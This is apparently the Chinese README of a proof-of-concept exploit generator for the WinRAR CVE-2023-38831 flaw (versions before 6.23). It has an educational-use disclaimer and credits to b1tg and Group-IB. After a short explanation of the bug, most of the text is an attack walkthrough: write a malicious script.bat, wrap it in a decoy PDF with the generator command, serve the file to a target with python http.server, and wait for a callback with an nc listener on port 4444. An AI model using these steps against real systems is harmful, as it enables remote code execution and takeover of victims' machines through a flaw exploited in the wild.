⚠️ 仅供教育和授权安全研究使用
非常感谢原始 PoC 作者 b1tg 和 Group-IB Threat Intelligence
RARLabs WinRAR 6.23 之前的版本允许攻击者在用户尝试查看 ZIP 压缩包中的良性文件时执行任意代码。

问题成因在于:ZIP 压缩包可能包含一个良性文件(例如普通的 .JPG 文件),同时还有一个与该良性文件同名的文件夹;当用户仅尝试访问该良性文件时,文件夹中的内容(可能包含可执行内容)也会被处理。该漏洞已在 2023 年 4 月至 8 月期间在野外被利用。

首先,将你的危险执行代码写入 script.bat 文件
插入诱饵文件,建议使用图片(.png、.jpg)或文档(.pdf)
运行以下命令生成漏洞利用文件
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
使用 python http.server 将漏洞利用文件发送到目标机器,例如:
python -m http.server
在攻击者机器上设置监听器:
nc -nlvp 4444
使用 6.23 之前的 WinRAR 版本下载并打开漏洞利用文件